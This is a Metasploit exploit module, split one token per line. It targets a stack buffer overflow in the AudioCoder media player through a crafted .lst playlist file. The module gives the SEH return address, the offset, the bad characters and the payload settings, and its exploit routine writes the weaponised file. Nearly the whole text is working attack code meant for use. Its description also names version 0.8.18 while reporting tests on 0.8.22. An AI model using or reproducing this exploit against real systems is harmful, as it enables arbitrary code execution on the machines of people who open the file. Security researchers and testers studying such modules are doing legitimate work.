require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::
FILEFORMAT
include Msf::Exploit::Seh
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'AudioCoder .lst Buffer Overflow'
,
'Description'
=> %q{
This
module
exploits a buffer overflow
in
Audio Code
0
.
8
.
18
. The vulnerability
occurs
when
adding an .lst, allowing arbitrary code execution with the privileges
of the user running AudioCoder. This
module
has been tested successfully on
AudioCoder
0
.
8
.
22
over Windows
XP
SP3
and
Windows
7
SP1
.
},
'License'
=>
MSF_LICENSE
,
'Author'
=>
[
'onying'
,
# Vulnerability discovery and PoC
'Asesino04'
# Metasploit module
],
'References'
=>
[
[
'OSVDB'
,
'N/A'
],
[
'EDB'
,
'26448'
]
],
'DefaultOptions'
=>
{
'EXITFUNC'
=>
'process'
},
'Platform'
=>
'win'
,
'Payload'
=>
{
'Space'
=>
6596
,
'BadChars'
=>
"\x00\x5c\x40\x0d\x0a"
,
'DisableNops'
=>
true
,
'StackAdjustment'
=> -
3500
,
},
'Targets'
=>
[
[
'AudioCoder 0.8.22 / Windows XP SP3 / Windows 7 SP1'
,
{
'Ret'
=> 0x66011b56,
# libiconv-2.dll
'Offset'
=>
765
}
]
],
'Privileged'
=>
false
,
'DisclosureDate'
=>
'juin 01 2013'
,
'DefaultTarget'
=>
0
))
register_options(
[
OptString.
new
(
'FILENAME'
, [
false
,
'The file name.'
,
'msf.lst'
]),
],
self
.
class
)
end
def
exploit
buffer =
"http://"
buffer << rand_text(target[
'Offset'
])
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
file_create(buffer)
end
end